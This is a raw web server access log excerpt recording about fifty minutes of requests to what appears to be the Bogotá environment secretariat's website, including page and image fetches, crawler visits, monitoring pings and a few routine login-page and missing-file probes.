172.22.2.4 - - [12/Apr/2023:03:07:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
216.245.221.92 - - [12/Apr/2023:03:10:17 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.21 - - [12/Apr/2023:03:12:02 -0500] "GET /images/Bogot\xc3\xa1-Regi\xc3\xb3n-unidos-por-el-cuidado-del-agua.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [12/Apr/2023:03:12:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:03:12:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:13:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
216.245.221.92 - - [12/Apr/2023:03:15:17 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.3 - - [12/Apr/2023:03:15:28 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 206 1109
172.22.2.4 - - [12/Apr/2023:03:15:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [12/Apr/2023:03:17:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.219 - - [12/Apr/2023:03:19:04 -0500] "GET /pdc/actos/1731.pdf HTTP/1.1" 200 724138
66.249.70.172 - - [12/Apr/2023:03:19:36 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:03:19:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42536
201.245.192.253 - - [12/Apr/2023:03:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43173
172.22.2.4 - - [12/Apr/2023:03:18:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:03:20:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:19:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
172.22.2.4 - - [12/Apr/2023:03:22:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
201.245.192.253 - - [12/Apr/2023:03:22:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.30 - - [12/Apr/2023:03:23:09 -0500] "GET /BLA/boletinlegal/notificaciones.php HTTP/1.1" 200 16620
168.119.253.11 - - [12/Apr/2023:03:23:24 -0500] "GET / HTTP/1.1" 200 319
168.119.253.11 - - [12/Apr/2023:03:23:24 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.168 - - [12/Apr/2023:03:23:41 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
159.203.208.14 - - [12/Apr/2023:03:24:13 -0500] "GET / HTTP/1.1" 200 319
185.119.81.104 - - [12/Apr/2023:02:35:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
216.245.221.92 - - [12/Apr/2023:03:25:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:24:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:24:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
201.245.192.253 - - [12/Apr/2023:03:27:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.120 - - [12/Apr/2023:03:28:31 -0500] "GET /images/contenedores-1_optimized.jpeg HTTP/1.1" 200 34036
66.249.70.210 - - [12/Apr/2023:03:28:34 -0500] "-" 408 -
66.249.70.170 - - [12/Apr/2023:03:28:37 -0500] "GET /bogota-region-unidos-por-la-proteccion-y-el-cuidado-del-agua.html HTTP/1.1" 200 824
201.245.192.253 - - [12/Apr/2023:03:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42536
201.245.192.253 - - [12/Apr/2023:03:29:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43173
216.245.221.92 - - [12/Apr/2023:03:30:17 -0500] "HEAD / HTTP/1.1" 200 -
193.32.162.159 - - [12/Apr/2023:03:30:32 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [12/Apr/2023:03:30:42 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
168.119.49.52 - - [12/Apr/2023:03:31:33 -0500] "GET / HTTP/1.1" 200 319
168.119.49.52 - - [12/Apr/2023:03:31:34 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [12/Apr/2023:03:29:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.168 - - [12/Apr/2023:03:32:02 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:03:30:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [12/Apr/2023:03:32:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.63 - - [12/Apr/2023:03:33:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/5112.pdf HTTP/1.1" 304 -
216.245.221.92 - - [12/Apr/2023:03:35:17 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [12/Apr/2023:03:36:41 -0500] "-" 408 -
35.204.221.1 - - [12/Apr/2023:03:36:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
17.241.227.12 - - [12/Apr/2023:03:37:03 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:03:35:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:03:37:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:03:36:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
201.245.192.253 - - [12/Apr/2023:03:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42536
201.245.192.253 - - [12/Apr/2023:03:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43173
216.245.221.92 - - [12/Apr/2023:03:40:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:03:42:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
162.55.175.158 - - [12/Apr/2023:03:42:51 -0500] "GET / HTTP/1.1" 200 319
162.55.175.158 - - [12/Apr/2023:03:42:51 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.104 - - [12/Apr/2023:02:03:02 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 502 1191
172.22.2.4 - - [12/Apr/2023:03:41:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.170 - - [12/Apr/2023:03:43:36 -0500] "GET /secretaria-de-ambiente-destaca-aportes-de-empresas-y-ciudadanos-que-ayudaron-a-mitigar-efectos-de-la-alerta-fase-i.html HTTP/1.1" 200 1019
172.22.2.4 - - [12/Apr/2023:03:42:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
69.171.249.11 - - [12/Apr/2023:03:44:33 -0500] "GET /images/Fauna-silvestre-jornada-sensibilizacion-semana-santa.jpeg HTTP/1.1" 200 50019
69.171.249.117 - - [12/Apr/2023:03:44:33 -0500] "GET /images/palma-de-cera-1-abril_optimized.jpeg HTTP/1.1" 200 171987
